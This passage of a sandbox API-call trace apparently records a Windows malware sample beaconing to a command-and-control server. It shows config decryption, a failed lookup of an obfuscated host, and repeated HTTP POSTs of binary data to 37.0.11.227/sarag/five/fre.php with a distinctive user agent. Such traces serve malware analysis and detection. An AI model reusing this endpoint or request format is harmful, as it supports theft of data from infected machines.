[0345.781] GetProcessHeap () returned 0x690000 [0345.782] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0345.782] send (s=0xc90, buf=0x6ad508*, len=242, flags=0) returned 242 [0345.782] send (s=0xc90, buf=0x6aba40*, len=159, flags=0) returned 159 [0345.782] GetProcessHeap () returned 0x690000 [0345.782] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0345.782] recv (in: s=0xc90, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0345.871] GetProcessHeap () returned 0x690000 [0345.871] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0345.872] GetProcessHeap () returned 0x690000 [0345.872] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0345.872] GetProcessHeap () returned 0x690000 [0345.872] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afec0 | out: hHeap=0x690000) returned 1 [0345.872] GetProcessHeap () returned 0x690000 [0345.873] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeff0 | out: hHeap=0x690000) returned 1 [0345.873] closesocket (s=0xc90) returned 0 [0345.874] GetProcessHeap () returned 0x690000 [0345.874] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab460 | out: hHeap=0x690000) returned 1 [0345.874] GetProcessHeap () returned 0x690000 [0345.874] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0345.876] GetProcessHeap () returned 0x690000 [0345.876] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0345.876] GetProcessHeap () returned 0x690000 [0345.877] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0345.877] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x19e0) returned 0xc90 [0345.878] Sleep (dwMilliseconds=0xea60) [0345.880] GetProcessHeap () returned 0x690000 [0345.880] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0345.880] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0345.881] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0345.887] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0345.888] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeff0) returned 1 [0345.895] GetProcessHeap () returned 0x690000 [0345.895] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a30 [0345.903] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0345.904] CryptImportKey (in: hProv=0x6aeff0, pbData=0x6a8a30, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0345.904] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0345.905] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0345.906] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0345.906] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0345.906] GetProcessHeap () returned 0x690000 [0345.906] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a30 | out: hHeap=0x690000) returned 1 [0345.908] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0345.909] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0345.910] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0345.910] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0345.911] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0345.912] CryptReleaseContext (hProv=0x6aeff0, dwFlags=0x0) returned 1 [0345.912] GetProcessHeap () returned 0x690000 [0345.912] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0345.913] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0345.914] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0345.915] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0345.915] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0345.916] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0345.917] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0345.918] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0345.918] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0345.918] GetProcessHeap () returned 0x690000 [0345.919] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0345.919] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0345.919] GetProcessHeap () returned 0x690000 [0345.920] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0345.920] GetProcessHeap () returned 0x690000 [0345.920] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0345.920] GetProcessHeap () returned 0x690000 [0345.920] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0345.921] GetProcessHeap () returned 0x690000 [0345.921] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0345.921] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0345.922] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0345.926] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0345.927] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeff0) returned 1 [0345.932] GetProcessHeap () returned 0x690000 [0345.932] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0345.933] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0345.933] CryptImportKey (in: hProv=0x6aeff0, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0345.934] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0345.934] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0345.935] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0345.935] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0345.935] GetProcessHeap () returned 0x690000 [0345.936] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0345.936] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0345.937] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0345.937] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0345.937] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0345.938] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0345.938] CryptReleaseContext (hProv=0x6aeff0, dwFlags=0x0) returned 1 [0345.938] GetProcessHeap () returned 0x690000 [0345.938] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0345.939] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0345.939] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0345.940] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0345.940] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0345.941] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0345.941] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0345.941] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0345.942] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0345.942] GetProcessHeap () returned 0x690000 [0345.942] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0345.942] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0345.942] GetProcessHeap () returned 0x690000 [0345.942] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab4b0 [0345.942] socket (af=2, type=1, protocol=6) returned 0xc94 [0345.942] connect (s=0xc94, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0345.970] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0345.970] GetProcessHeap () returned 0x690000 [0345.970] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aef68 [0345.970] GetProcessHeap () returned 0x690000 [0345.970] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0345.971] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0345.971] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0345.971] GetProcessHeap () returned 0x690000 [0345.971] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b0280 [0345.971] GetProcessHeap () returned 0x690000 [0345.972] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0345.972] GetProcessHeap () returned 0x690000 [0345.972] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4340 [0345.972] GetProcessHeap () returned 0x690000 [0345.972] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0345.973] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0345.974] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0345.974] GetProcessHeap () returned 0x690000 [0345.974] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0345.974] GetProcessHeap () returned 0x690000 [0345.975] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0345.975] send (s=0xc94, buf=0x6ad508*, len=242, flags=0) returned 242 [0345.976] send (s=0xc94, buf=0x6aba40*, len=159, flags=0) returned 159 [0345.976] GetProcessHeap () returned 0x690000 [0345.976] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0345.976] recv (in: s=0xc94, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0346.044] GetProcessHeap () returned 0x690000 [0346.045] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0346.045] GetProcessHeap () returned 0x690000 [0346.045] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0346.046] GetProcessHeap () returned 0x690000 [0346.046] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b0280 | out: hHeap=0x690000) returned 1 [0346.046] GetProcessHeap () returned 0x690000 [0346.046] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aef68 | out: hHeap=0x690000) returned 1 [0346.046] closesocket (s=0xc94) returned 0 [0346.047] GetProcessHeap () returned 0x690000 [0346.047] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab4b0 | out: hHeap=0x690000) returned 1 [0346.047] GetProcessHeap () returned 0x690000 [0346.048] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0346.048] GetProcessHeap () returned 0x690000 [0346.048] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0346.049] GetProcessHeap () returned 0x690000 [0346.049] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0346.050] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x19e8) returned 0xc94 [0346.051] Sleep (dwMilliseconds=0xea60) [0346.052] GetProcessHeap () returned 0x690000 [0346.052] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0346.053] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0346.054] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0346.059] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0346.059] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af078) returned 1 [0346.072] GetProcessHeap () returned 0x690000 [0346.072] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0346.076] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0346.076] CryptImportKey (in: hProv=0x6af078, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0346.077] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0346.077] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0346.078] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0346.078] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0346.078] GetProcessHeap () returned 0x690000 [0346.079] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0346.080] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0346.080] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0346.081] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0346.081] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0346.082] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0346.082] CryptReleaseContext (hProv=0x6af078, dwFlags=0x0) returned 1 [0346.082] GetProcessHeap () returned 0x690000 [0346.082] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0346.083] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0346.083] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0346.086] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0346.087] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0346.087] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0346.088] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0346.088] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0346.094] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0346.094] GetProcessHeap () returned 0x690000 [0346.094] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0346.094] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0346.094] GetProcessHeap () returned 0x690000 [0346.095] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0346.095] GetProcessHeap () returned 0x690000 [0346.096] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0346.096] GetProcessHeap () returned 0x690000 [0346.096] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0346.096] GetProcessHeap () returned 0x690000 [0346.096] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0346.097] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0346.097] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0346.103] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0346.104] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aee58) returned 1 [0346.113] GetProcessHeap () returned 0x690000 [0346.113] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0346.113] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0346.114] CryptImportKey (in: hProv=0x6aee58, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0346.115] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0346.115] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0346.116] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0346.116] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0346.116] GetProcessHeap () returned 0x690000 [0346.117] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0346.127] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0346.134] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0346.134] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0346.135] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0346.135] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0346.136] CryptReleaseContext (hProv=0x6aee58, dwFlags=0x0) returned 1 [0346.136] GetProcessHeap () returned 0x690000 [0346.136] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0346.137] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0346.137] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0346.138] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0346.138] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0346.139] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0346.139] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0346.140] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0346.141] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0346.141] GetProcessHeap () returned 0x690000 [0346.141] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0346.141] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0346.141] GetProcessHeap () returned 0x690000 [0346.141] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab460 [0346.141] socket (af=2, type=1, protocol=6) returned 0xc98 [0346.143] connect (s=0xc98, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0346.169] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0346.169] GetProcessHeap () returned 0x690000 [0346.169] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af188 [0346.169] GetProcessHeap () returned 0x690000 [0346.169] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0346.170] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0346.171] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0346.174] GetProcessHeap () returned 0x690000 [0346.174] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afbc0 [0346.174] GetProcessHeap () returned 0x690000 [0346.175] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0346.175] GetProcessHeap () returned 0x690000 [0346.175] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4340 [0346.175] GetProcessHeap () returned 0x690000 [0346.175] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0346.176] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0346.177] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0346.177] GetProcessHeap () returned 0x690000 [0346.177] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0346.177] GetProcessHeap () returned 0x690000 [0346.177] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0346.177] send (s=0xc98, buf=0x6ad508*, len=242, flags=0) returned 242 [0346.178] send (s=0xc98, buf=0x6aba40*, len=159, flags=0) returned 159 [0346.178] GetProcessHeap () returned 0x690000 [0346.178] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0346.178] recv (in: s=0xc98, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0346.245] GetProcessHeap () returned 0x690000 [0346.245] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0346.246] GetProcessHeap () returned 0x690000 [0346.246] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0346.246] GetProcessHeap () returned 0x690000 [0346.246] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afbc0 | out: hHeap=0x690000) returned 1 [0346.246] GetProcessHeap () returned 0x690000 [0346.246] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af188 | out: hHeap=0x690000) returned 1 [0346.246] closesocket (s=0xc98) returned 0 [0346.248] GetProcessHeap () returned 0x690000 [0346.248] HeapFree (in: 